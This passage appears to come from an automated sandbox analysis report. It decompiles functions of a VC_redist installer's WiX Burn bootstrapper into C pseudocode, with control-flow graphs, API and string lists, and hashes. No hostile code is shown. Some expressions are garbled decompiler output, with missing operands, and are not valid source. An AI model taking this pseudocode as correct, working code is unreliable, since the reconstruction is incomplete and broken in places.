											_t77 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
											E000B37D3(0x80004005, "cache.cpp", 0x6c9, _t77);
											_push("Failed to seek to signature table in exe header.");
											goto L19;
										}
									} else {
										L10:
										_push("Failed to update signature offset.");
										goto L19;
									}
								} else {
									_t57 = GetLastError();
									_t87 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
									_t77 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
									E000B37D3(0x80004005, "cache.cpp", 0x6bf, _t77);
									_push("Failed to seek to checksum in exe header.");
									L19:
									_push(_t77);
									E000F012F();
								}
							}
						} else {
							_push(_v24);
							E000F012F(_t77, "Failed to copy engine from: %ls to: %ls", _v28);
						}
					} else {
						E000F012F(_t77, "Failed to seek to beginning of engine file: %ls", _v28);
					}
					FindCloseChangeNotification(_t75); // executed
				} else {
					_t62 = GetLastError();
					_t90 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
					_t77 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "cache.cpp", 0x6af,  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000);
					E000F012F( >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000, "Failed to create engine file at path: %ls", _v24);
				}
				return E000DDE36(_t66, _v8 ^ _t91, _t73, _t75, _t77);
			}

























                                                                          0x000c84c4
                                                                          0x000c84ca
                                                                          0x000c84d1
                                                                          0x000c84d7
                                                                          0x000c84db
                                                                          0x000c84df
                                                                          0x000c84e5
                                                                          0x000c84f2
                                                                          0x000c84f7
                                                                          0x000c8501
                                                                          0x000c8503
                                                                          0x000c8506
                                                                          0x000c8507
                                                                          0x000c850d
                                                                          0x000c8512
                                                                          0x000c855f
                                                                          0x000c8564
                                                                          0x000c8568
                                                                          0x000c858b
                                                                          0x000c8590
                                                                          0x000c8594
                                                                          0x000c85b4
                                                                          0x000c85ba
                                                                          0x000c85c9
                                                                          0x000c8613
                                                                          0x000c8621
                                                                          0x000c8630
                                                                          0x000c8676
                                                                          0x000c867a
                                                                          0x00000000
                                                                          0x000c867c
                                                                          0x000c8688
                                                                          0x000c868c
                                                                          0x00000000
                                                                          0x000c868e
                                                                          0x000c8690
                                                                          0x000c869f
                                                                          0x000c86e2
                                                                          0x000c86e6
                                                                          0x000c86e8
                                                                          0x00000000
                                                                          0x000c86e8
                                                                          0x000c86a1
                                                                          0x000c86a1
                                                                          0x000c86b2
                                                                          0x000c86bc
                                                                          0x000c86ca
                                                                          0x000c86cf
                                                                          0x00000000
                                                                          0x000c86cf
                                                                          0x000c869f
                                                                          0x000c868c
                                                                          0x000c8632
                                                                          0x000c8632
                                                                          0x000c8643
                                                                          0x000c864d
                                                                          0x000c865b
                                                                          0x000c8660
                                                                          0x00000000
                                                                          0x000c8660
                                                                          0x000c8615
                                                                          0x000c8615
                                                                          0x000c8615
                                                                          0x00000000
                                                                          0x000c8615
                                                                          0x000c85cb
                                                                          0x000c85cb
                                                                          0x000c85dc
                                                                          0x000c85e6
                                                                          0x000c85f4
                                                                          0x000c85f9
                                                                          0x000c86ed
                                                                          0x000c86ed
                                                                          0x000c86ee
                                                                          0x000c86f4
                                                                          0x000c85c9
                                                                          0x000c8596
                                                                          0x000c8596
                                                                          0x000c85a2
                                                                          0x000c85a7
                                                                          0x000c856a
                                                                          0x000c8573
                                                                          0x000c8578
                                                                          0x000c86f6
                                                                          0x000c8514
                                                                          0x000c8514
                                                                          0x000c8525
                                                                          0x000c852f
                                                                          0x000c853d
                                                                          0x000c854b
                                                                          0x000c8550
                                                                          0x000c870e

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,000B4CB6,?,?,00000000,000B4CB6,00000000), ref: 000C8507
                                                                          • GetLastError.KERNEL32 ref: 000C8514
                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,000FB4F0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C86F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeCloseCreateErrorFileFindLastNotification
                                                                          • String ID: @Met$Failed to copy user from: %ls to: %ls$Failed to create user file at path: %ls$Failed to seek to beginning of user file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                          • API String ID: 4091947256-324234727
                                                                          • Opcode ID: 5a3547fba41793421778ca9c1fe464db083d633650d052a3a788bcd1afd7668a
                                                                          • Instruction ID: f4a8ff6df1e2c06b7bef65a90a85a10a40d25bae924594425062e219d2ec0b01
                                                                          • Opcode Fuzzy Hash: 5a3547fba41793421778ca9c1fe464db083d633650d052a3a788bcd1afd7668a
                                                                          • Instruction Fuzzy Hash: 8551C5B2E402257BF7216B688C49FBF7698EF04750F014129FE00E71C1EBA49C0097E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000C7337 Relevance: 35.3, APIs: 1, Strings: 19, Instructions: 277COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1096 c7337-c737c call df670 call b7503 1101 c737e-c7383 1096->1101 1102 c7388-c7399 call bc2a1 1096->1102 1103 c7602-c7609 call f012f 1101->1103 1107 c739b-c73a0 1102->1107 1108 c73a5-c73b6 call bc108 1102->1108 1110 c760a-c760f 1103->1110 1107->1103 1118 c73b8-c73bd 1108->1118 1119 c73c2-c73d7 call bc362 1108->1119 1112 c7617-c761b 1110->1112 1113 c7611-c7612 call f54ef 1110->1113 1116 c761d-c7620 call f54ef 1112->1116 1117 c7625-c762a 1112->1117 1113->1112 1116->1117 1122 c762c-c762d call f54ef 1117->1122 1123 c7632-c763f call bc055 1117->1123 1118->1103 1127 c73d9-c73de 1119->1127 1128 c73e3-c73f3 call dbdc9 1119->1128 1122->1123 1131 c7649-c764d 1123->1131 1132 c7641-c7644 call f54ef 1123->1132 1127->1103 1140 c73ff-c7472 call c5a35 1128->1140 1141 c73f5-c73fa 1128->1141 1135 c764f-c7652 call f54ef 1131->1135 1136 c7657-c765b 1131->1136 1132->1131 1135->1136 1138 c765d-c7660 call b3999 1136->1138 1139 c7665-c766d 1136->1139 1138->1139 1145 c747e-c74c2 call b550f GetCurrentProcess call f076c call b8152 1140->1145 1146 c7474-c7479 1140->1146 1141->1103 1153 c74dc-c74e1 1145->1153 1154 c74c4-c74d7 call f012f 1145->1154 1146->1103 1156 c753d-c7542 1153->1156 1157 c74e3-c74f5 call b80f6 1153->1157 1154->1110 1158 c7544-c7556 call b80f6 1156->1158 1159 c7562-c756b 1156->1159 1168 c74f7-c74fc 1157->1168 1169 c7501-c7511 call b3446 1157->1169 1158->1159 1171 c7558-c755d 1158->1171 1163 c756d-c7570 1159->1163 1164 c7577-c758b call ca307 1159->1164 1163->1164 1167 c7572-c7575 1163->1167 1178 c758d-c7592 1164->1178 1179 c7594 1164->1179 1167->1164 1172 c759a-c759d 1167->1172 1168->1103 1181 c751d-c7531 call b80f6 1169->1181 1182 c7513-c7518 1169->1182 1171->1103 1175 c759f-c75a2 1172->1175 1176 c75a4-c75ba call bd497 1172->1176 1175->1110 1175->1176 1186 c75bc-c75c1 1176->1186 1187 c75c3-c75d2 call bcabe 1176->1187 1178->1103 1179->1172 1181->1156 1188 c7533-c7538 1181->1188 1182->1103 1186->1103 1190 c75d7-c75db 1187->1190 1188->1103 1191 c75dd-c75e2 1190->1191 1192 c75e4-c75fb call bc7df 1190->1192 1191->1103 1192->1110 1195 c75fd 1192->1195 1195->1103
                                                                          C-Code - Quality: 83%
                                                                          			E000C7337(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v124;
				void* __ebx;
				void* __edi;
				void* _t70;
				intOrPtr _t73;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr _t96;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr* _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				void* _t140;
				void* _t141;
				intOrPtr _t142;
				intOrPtr _t149;
				intOrPtr _t152;

				_t140 = __edx;
				_v12 = 0;
				_v28 = 0;
				_v20 = 0;
				_v32 = 0;
				E000DF670(_t141,  &_v124, 0, 0x58);
				_t142 = _a4;
				_v36 = 0;
				_v8 = 0;
				_v16 = 0;
				_v24 = 0;
				_t11 = _t142 + 0x88; // 0xb533d
				_t135 = _t11;
				_t70 = E000B7503(_t11); // executed
				if(_t70 >= 0) {
					_t13 = _t142 + 0x48; // 0xb52fd
					_t73 = E000BC2A1(_t13,  &_v124); // executed
					__eflags = _t73;
					if(_t73 >= 0) {
						_t76 = E000BC108( &_v124,  &_v28);
						__eflags = _t76;
						if(_t76 >= 0) {
							__eflags = E000BC362( &_v124,  &_v20,  &_v32);
							if(__eflags >= 0) {
								_t81 = E000DBDC9(__eflags, _v20, _v32, _t142); // executed
								__eflags = _t81;
								if(_t81 >= 0) {
									_t22 = _t142 + 0x1c0; // 0xb5475
									_t23 = _t142 + 0x4d8; // 0xb578d
									_t24 = _t142 + 0x140; // 0xb53f5
									_t25 = _t142 + 0x400; // 0xb56b5
									_t26 = _t142 + 0x3fc; // 0xb56b1
									_t27 = _t142 + 0x4d4; // 0xb5789
									_t30 = _t142 + 0x3ec; // 0xb56a1
									_t31 = _t142 + 0x494; // 0xb5749
									_t32 = _t142 + 0x490; // 0xb5745
									_t136 = _t32;
									_t33 = _t142 + 0x4b8; // 0xb576d
									_t34 = _t142 + 0x4a0; // 0xb5755
									_t35 = _t142 + 0x1c; // 0xb52d1
									_t36 = _t142 + 0x4e0; // 0x485
									_t37 = _t142 + 0x4dc; // 0x48d016a
									_t96 = E000C5A35( *_t37,  *_t36, _t35, _t34, _t33, _t135, _t32, _t31, _t30,  &_v8,  &_v24, _t27, _t26, _t25, _t24, _t23, _t22,  &_v12);
									__eflags = _t96;
									if(_t96 >= 0) {
										__eflags = _v12;
										_t98 =  !=  ? _v12 : 0xfb524;
										E000B550F(2, 0x20000009,  !=  ? _v12 : 0xfb524); // executed
										E000F076C(GetCurrentProcess(),  &_v36); // executed
										asm("cdq");
										_t149 = E000B8152(_t135, L"WixBundleElevated", _v36, _t140, 1);
										__eflags = _t149;
										if(_t149 >= 0) {
											_t105 = _v8;
											__eflags = _t105;
											if(_t105 == 0) {
												L21:
												_t106 = _v24;
												__eflags = _t106;
												if(_t106 == 0) {
													L24:
													_t47 = _t142 + 0x490; // 0xb5745
													_t107 = _t47;
													__eflags =  *_t107;
													if( *_t107 == 0) {
														L27:
														_t49 = _t142 + 0x100; // 0xb53b5
														_t109 = E000CA307(_t135, _t49, _t135, _v8);
														__eflags = _t109;
														if(_t109 >= 0) {
															_t50 = _t142 + 0x490; // 0xb5745
															_t107 = _t50;
															goto L30;
														} else {
															_push("Failed to initialize internal cache functionality.");
															goto L38;
														}
													} else {
														__eflags =  *_t107 - 1;
														if( *_t107 == 1) {
															goto L27;
														} else {
															__eflags =  *_t107 - 3;
															if( *_t107 != 3) {
																L30:
																__eflags =  *_t107 - 1;
																if(__eflags == 0) {
																	L32:
																	_t51 = _t142 + 0xcc; // 0xb5381
																	_t135 = _t51;
																	_t52 = _t142 + 0x110; // 0xfff9e89d, executed
																	_t110 = E000BD497(_t136, _t140, _t142, __eflags,  *_t52, _t51); // executed
																	__eflags = _t110;
																	if(_t110 >= 0) {
																		_t54 = _t142 + 0xbc; // 0xb5371
																		_t112 = E000BCABE(_t54, 0,  &_v124,  *_t135); // executed
																		_t152 = _t112;
																		__eflags = _t152;
																		if(_t152 >= 0) {
																			_t55 = _t142 + 0xbc; // 0xb5371
																			_t56 = _t142 + 0x2b0; // 0xb5565
																			_t152 = E000BC7DF(_t140, _t56, _t55);
																			__eflags = _t152;
																			if(_t152 < 0) {
																				_push("Failed to load catalog files.");
																				goto L38;
																			}
																		} else {
																			_push("Failed to extract bootstrapper application payloads.");
																			goto L38;
																		}
																	} else {
																		_push("Failed to get unique temporary folder for bootstrapper application.");
																		goto L38;
																	}
																} else {
																	__eflags =  *_t107 - 3;
																	if(__eflags == 0) {
																		goto L32;
																	}
																}
															} else {
																goto L27;
															}
														}
													}
												} else {
													_t152 = E000B80F6(_t135, L"WixBundleOriginalSource", _t106, 0);
													__eflags = _t152;
													if(_t152 >= 0) {
														goto L24;
													} else {
														_push("Failed to set original source variable.");
														goto L38;
													}
												}
											} else {
												_t152 = E000B80F6(_t135, L"WixBundleSourceProcessPath", _t105, 1);
												__eflags = _t152;
												if(_t152 >= 0) {
													_t152 = E000B3446(_t136, _v8,  &_v16);
													__eflags = _t152;
													if(_t152 >= 0) {
														_t152 = E000B80F6(_t135, L"WixBundleSourceProcessFolder", _v16, 1);
														__eflags = _t152;
														if(_t152 >= 0) {
															goto L21;
														} else {
															_push("Failed to set source process folder variable.");
															goto L38;
														}
													} else {
														_push("Failed to get source process folder from path.");
														goto L38;
													}
												} else {
													_push("Failed to set source process path variable.");
													goto L38;
												}
											}
										} else {
											E000F012F(_t149, "Failed to overwrite the %ls built-in variable.", L"WixBundleElevated");
										}
									} else {
										_push("Failed to parse command line.");
										goto L38;
									}
								} else {
									_push("Failed to load manifest.");
									goto L38;
								}
							} else {
								_push("Failed to get manifest stream from container.");
								goto L38;
							}
						} else {
							_push("Failed to open manifest stream.");
							goto L38;
						}
					} else {
						_push("Failed to open attached UX container.");
						goto L38;
					}
				} else {
					_push("Failed to initialize variables.");
					L38:
					_push(_t152);
					E000F012F();
				}
				_t116 = _v24;
				if(_v24 != 0) {
					E000F54EF(_t116);
				}
				if(_v16 != 0) {
					E000F54EF(_v16);
				}
				_t117 = _v8;
				if(_v8 != 0) {
					E000F54EF(_t117);
				}
				E000BC055(_t135,  &_v124);
				if(_v28 != 0) {
					E000F54EF(_v28);
				}
				if(_v12 != 0) {
					E000F54EF(_v12);
				}
				if(_v20 != 0) {
					E000B3999(_v20); // executed
				}
				return _t152;
			}






























                                                                          0x000c7337
                                                                          0x000c7349
                                                                          0x000c734c
                                                                          0x000c734f
                                                                          0x000c7352
                                                                          0x000c7355
                                                                          0x000c735a
                                                                          0x000c7360
                                                                          0x000c7363
                                                                          0x000c7366
                                                                          0x000c7369
                                                                          0x000c736c
                                                                          0x000c736c
                                                                          0x000c7373
                                                                          0x000c737c
                                                                          0x000c738c
                                                                          0x000c7390
                                                                          0x000c7397
                                                                          0x000c7399
                                                                          0x000c73ad
                                                                          0x000c73b4
                                                                          0x000c73b6
                                                                          0x000c73d5
                                                                          0x000c73d7
                                                                          0x000c73ea
                                                                          0x000c73f1
                                                                          0x000c73f3
                                                                          0x000c7403
                                                                          0x000c740a
                                                                          0x000c7411
                                                                          0x000c7418
                                                                          0x000c741f
                                                                          0x000c7426
                                                                          0x000c7435
                                                                          0x000c743c
                                                                          0x000c7443
                                                                          0x000c7443
                                                                          0x000c744b
                                                                          0x000c7452
                                                                          0x000c7459
                                                                          0x000c745d
                                                                          0x000c7463
                                                                          0x000c7469
                                                                          0x000c7470
                                                                          0x000c7472
                                                                          0x000c747e
                                                                          0x000c7487
                                                                          0x000c7493
                                                                          0x000c74a6
                                                                          0x000c74b0
                                                                          0x000c74be
                                                                          0x000c74c0
                                                                          0x000c74c2
                                                                          0x000c74dc
                                                                          0x000c74df
                                                                          0x000c74e1
                                                                          0x000c753d
                                                                          0x000c753d
                                                                          0x000c7540
                                                                          0x000c7542
                                                                          0x000c7562
                                                                          0x000c7562
                                                                          0x000c7562
                                                                          0x000c7568
                                                                          0x000c756b
                                                                          0x000c7577
                                                                          0x000c757a
                                                                          0x000c7582
                                                                          0x000c7589
                                                                          0x000c758b
                                                                          0x000c7594
                                                                          0x000c7594
                                                                          0x00000000
                                                                          0x000c758d
                                                                          0x000c758d
                                                                          0x00000000
                                                                          0x000c758d
                                                                          0x000c756d
                                                                          0x000c756d
                                                                          0x000c7570
                                                                          0x00000000
                                                                          0x000c7572
                                                                          0x000c7572
                                                                          0x000c7575
                                                                          0x000c759a
                                                                          0x000c759a
                                                                          0x000c759d
                                                                          0x000c75a4
                                                                          0x000c75a4
                                                                          0x000c75a4
                                                                          0x000c75ab
                                                                          0x000c75b1
                                                                          0x000c75b8
                                                                          0x000c75ba
                                                                          0x000c75c9
                                                                          0x000c75d2
                                                                          0x000c75d7
                                                                          0x000c75d9
                                                                          0x000c75db
                                                                          0x000c75e4
                                                                          0x000c75eb
                                                                          0x000c75f7
                                                                          0x000c75f9
                                                                          0x000c75fb
                                                                          0x000c75fd
                                                                          0x00000000
                                                                          0x000c75fd
                                                                          0x000c75dd
                                                                          0x000c75dd
                                                                          0x00000000
                                                                          0x000c75dd
                                                                          0x000c75bc
                                                                          0x000c75bc
                                                                          0x00000000
                                                                          0x000c75bc
                                                                          0x000c759f
                                                                          0x000c759f
                                                                          0x000c75a2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c75a2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c7575
                                                                          0x000c7570
                                                                          0x000c7544
                                                                          0x000c7552
                                                                          0x000c7554
                                                                          0x000c7556
                                                                          0x00000000
                                                                          0x000c7558
                                                                          0x000c7558
                                                                          0x00000000
                                                                          0x000c7558
                                                                          0x000c7556
                                                                          0x000c74e3
                                                                          0x000c74f1
                                                                          0x000c74f3
                                                                          0x000c74f5
                                                                          0x000c750d
                                                                          0x000c750f
                                                                          0x000c7511
                                                                          0x000c752d
                                                                          0x000c752f
                                                                          0x000c7531
                                                                          0x00000000
                                                                          0x000c7533
                                                                          0x000c7533
                                                                          0x00000000
                                                                          0x000c7533
                                                                          0x000c7513
                                                                          0x000c7513
                                                                          0x00000000
                                                                          0x000c7513
                                                                          0x000c74f7
                                                                          0x000c74f7
                                                                          0x00000000
                                                                          0x000c74f7
                                                                          0x000c74f5
                                                                          0x000c74c4
                                                                          0x000c74cf
                                                                          0x000c74d4
                                                                          0x000c7474
                                                                          0x000c7474
                                                                          0x00000000
                                                                          0x000c7474
                                                                          0x000c73f5
                                                                          0x000c73f5
                                                                          0x00000000
                                                                          0x000c73f5
                                                                          0x000c73d9
                                                                          0x000c73d9
                                                                          0x00000000
                                                                          0x000c73d9
                                                                          0x000c73b8
                                                                          0x000c73b8
                                                                          0x00000000
                                                                          0x000c73b8
                                                                          0x000c739b
                                                                          0x000c739b
                                                                          0x00000000
                                                                          0x000c739b
                                                                          0x000c737e
                                                                          0x000c737e
                                                                          0x000c7602
                                                                          0x000c7602
                                                                          0x000c7603
                                                                          0x000c7609
                                                                          0x000c760a
                                                                          0x000c760f
                                                                          0x000c7612
                                                                          0x000c7612
                                                                          0x000c761b
                                                                          0x000c7620
                                                                          0x000c7620
                                                                          0x000c7625
                                                                          0x000c762a
                                                                          0x000c762d
                                                                          0x000c762d
                                                                          0x000c7636
                                                                          0x000c763f
                                                                          0x000c7644
                                                                          0x000c7644
                                                                          0x000c764d
                                                                          0x000c7652
                                                                          0x000c7652
                                                                          0x000c765b
                                                                          0x000c7660
                                                                          0x000c7660
                                                                          0x000c766d

                                                                          Strings
                                                                          • WixBundleSourceProcessPath, xrefs: 000C74E6
                                                                          • WixBundleSourceProcessFolder, xrefs: 000C7522
                                                                          • Failed to overwrite the %ls built-in variable., xrefs: 000C74C9
                                                                          • Failed to extract bootstrapper application payloads., xrefs: 000C75DD
                                                                          • Failed to load manifest., xrefs: 000C73F5
                                                                          • Failed to set source process folder variable., xrefs: 000C7533
                                                                          • WixBundleElevated, xrefs: 000C74B3, 000C74C4
                                                                          • Failed to get unique temporary folder for bootstrapper application., xrefs: 000C75BC
                                                                          • Failed to get manifest stream from container., xrefs: 000C73D9
                                                                          • Failed to get source process folder from path., xrefs: 000C7513
                                                                          • WixBundleOriginalSource, xrefs: 000C7547
                                                                          • Failed to load catalog files., xrefs: 000C75FD
                                                                          • Failed to set source process path variable., xrefs: 000C74F7
                                                                          • Failed to open attached UX container., xrefs: 000C739B
                                                                          • Failed to open manifest stream., xrefs: 000C73B8
                                                                          • Failed to set original source variable., xrefs: 000C7558
                                                                          • Failed to parse command line., xrefs: 000C7474
                                                                          • Failed to initialize internal cache functionality., xrefs: 000C758D
                                                                          • Failed to initialize variables., xrefs: 000C737E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection
                                                                          • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath
                                                                          • API String ID: 32694325-252221001
                                                                          • Opcode ID: c97d9335469b017ed3d53c03c2976a679e307193c78494b27a1133aa71314813
                                                                          • Instruction ID: b2f7e65cde930656dae7657ec6a78acb5984ef49477beb47e11a69d13d10629c
                                                                          • Opcode Fuzzy Hash: c97d9335469b017ed3d53c03c2976a679e307193c78494b27a1133aa71314813
                                                                          • Instruction Fuzzy Hash: E8917972A44A19BBDB229BA4CC41FEEB7ACBF04700F00422AF615E7141D771EA449FD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000C80AE Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 151COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1329 c80ae-c80f7 call df670 1332 c80fd-c811d GetCurrentProcess call f076c 1329->1332 1333 c8270-c827d call b21a5 1329->1333 1338 c81ab-c81b9 GetTempPathW 1332->1338 1339 c8123-c8132 GetWindowsDirectoryW 1332->1339 1340 c828c-c829e call dde36 1333->1340 1341 c827f 1333->1341 1343 c81bb-c81ee call b37d3 1338->1343 1344 c81f3-c8205 UuidCreate 1338->1344 1345 c816c-c817d call b338f 1339->1345 1346 c8134-c8167 call b37d3 1339->1346 1347 c8284-c828b call f012f 1341->1347 1343->1347 1351 c820e-c8223 StringFromGUID2 1344->1351 1352 c8207-c820c 1344->1352 1360 c817f-c8184 1345->1360 1361 c8189-c819f call b36b4 1345->1361 1346->1347 1347->1340 1353 c8225-c823f call b37d3 1351->1353 1354 c8241-c8256 call b1f20 1351->1354 1352->1347 1353->1347 1367 c825b-c8262 1354->1367 1360->1347 1361->1344 1373 c81a1-c81a6 1361->1373 1371 c826b 1367->1371 1372 c8264-c8269 1367->1372 1371->1333 1372->1347 1373->1347
                                                                          C-Code - Quality: 53%
                                                                          			E000C80AE(void* __edx, intOrPtr _a8) {
				signed int _v8;
				char _v88;
				short _v608;
				char _v624;
				signed int _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				intOrPtr _t23;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t38;
				signed short _t40;
				signed short _t48;
				intOrPtr _t51;
				void* _t52;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;

				_t57 = __edx;
				_t18 =  *0x11a008; // 0xf77c1860
				_v8 = _t18 ^ _t68;
				_v628 = _v628 & 0x00000000;
				_t51 = _a8;
				E000DF670(_t58,  &_v608, 0, 0x208);
				_t59 =  &_v624;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t23 =  *0x11aa94; // 0x0
				if(_t23 != 0) {
					L17:
					_t60 = E000B21A5(_t51, _t23, 0);
					__eflags = _t60;
					if(_t60 < 0) {
						_push("Failed to copy working folder path.");
						goto L19;
					}
				} else {
					E000F076C(GetCurrentProcess(),  &_v628); // executed
					if(_v628 == 0) {
						_t32 = GetTempPathW(0x104,  &_v608);
						__eflags = _t32;
						if(_t32 != 0) {
							goto L10;
						} else {
							_t40 = GetLastError();
							__eflags = _t40;
							_t64 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							__eflags = _t64;
							_t60 =  >=  ? 0x80004005 : _t64;
							E000B37D3(0x80004005, "cache.cpp", 0x46b, _t60);
							_push("Failed to get temp path for working folder.");
							goto L19;
						}
					} else {
						_t59 = 0x104;
						if(GetWindowsDirectoryW( &_v608, 0x104) != 0) {
							_t60 = E000B338F(_t52, __eflags,  &_v608, 0x104);
							__eflags = _t60;
							if(_t60 >= 0) {
								_t60 = E000B36B4(_t52,  &_v608, 0x104, L"Temp\\");
								__eflags = _t60;
								if(_t60 >= 0) {
									L10:
									_t33 =  &_v624;
									__imp__UuidCreate(_t33);
									_t60 = _t33 | 0x00000001;
									__eflags = _t60;
									if(_t60 >= 0) {
										_t35 =  &_v624;
										__imp__StringFromGUID2(_t35,  &_v88, 0x27);
										__eflags = _t35;
										if(_t35 != 0) {
											_push( &_v88);
											_t38 = E000B1F20(0x11aa94, L"%ls%ls\\",  &_v608); // executed
											_t60 = _t38;
											__eflags = _t60;
											if(_t60 >= 0) {
												_t23 =  *0x11aa94; // 0x0
												goto L17;
											} else {
												_push("Failed to append bundle id on to temp path for working folder.");
												goto L19;
											}
										} else {
											_t60 = 0x8007000e;
											E000B37D3(_t35, "cache.cpp", 0x475, 0x8007000e);
											_push("Failed to convert working folder guid into string.");
											goto L19;
										}
									} else {
										_push("Failed to create working folder guid.");
										goto L19;
									}
								} else {
									_push("Failed to concat Temp directory on windows path for working folder.");
									goto L19;
								}
							} else {
								_push("Failed to ensure windows path for working folder ended in backslash.");
								goto L19;
							}
						} else {
							_t48 = GetLastError();
							_t67 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
							_t60 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
							E000B37D3(0x80004005, "cache.cpp", 0x460, _t60);
							_push("Failed to get windows path for working folder.");
							L19:
							_push(_t60);
							E000F012F();
						}
					}
				}
				return E000DDE36(_t51, _v8 ^ _t68, _t57, _t59, _t60);
			}



























                                                                          0x000c80ae
                                                                          0x000c80b7
                                                                          0x000c80be
                                                                          0x000c80c1
                                                                          0x000c80cf
                                                                          0x000c80dc
                                                                          0x000c80e3
                                                                          0x000c80e9
                                                                          0x000c80ed
                                                                          0x000c80ee
                                                                          0x000c80ef
                                                                          0x000c80f0
                                                                          0x000c80f7
                                                                          0x000c8270
                                                                          0x000c8279
                                                                          0x000c827b
                                                                          0x000c827d
                                                                          0x000c827f
                                                                          0x00000000
                                                                          0x000c827f
                                                                          0x000c80fd
                                                                          0x000c810b
                                                                          0x000c811d
                                                                          0x000c81b1
                                                                          0x000c81b7
                                                                          0x000c81b9
                                                                          0x00000000
                                                                          0x000c81bb
                                                                          0x000c81bb
                                                                          0x000c81ca
                                                                          0x000c81cc
                                                                          0x000c81d4
                                                                          0x000c81d6
                                                                          0x000c81e4
                                                                          0x000c81e9
                                                                          0x00000000
                                                                          0x000c81e9
                                                                          0x000c8123
                                                                          0x000c8123
                                                                          0x000c8132
                                                                          0x000c8179
                                                                          0x000c817b
                                                                          0x000c817d
                                                                          0x000c819b
                                                                          0x000c819d
                                                                          0x000c819f
                                                                          0x000c81f3
                                                                          0x000c81f3
                                                                          0x000c81fa
                                                                          0x000c8202
                                                                          0x000c8202
                                                                          0x000c8205
                                                                          0x000c8214
                                                                          0x000c821b
                                                                          0x000c8221
                                                                          0x000c8223
                                                                          0x000c8244
                                                                          0x000c8256
                                                                          0x000c825b
                                                                          0x000c8260
                                                                          0x000c8262
                                                                          0x000c826b
                                                                          0x00000000
                                                                          0x000c8264
                                                                          0x000c8264
                                                                          0x00000000
                                                                          0x000c8264
                                                                          0x000c8225
                                                                          0x000c8225
                                                                          0x000c8235
                                                                          0x000c823a
                                                                          0x00000000
                                                                          0x000c823a
                                                                          0x000c8207
                                                                          0x000c8207
                                                                          0x00000000
                                                                          0x000c8207
                                                                          0x000c81a1
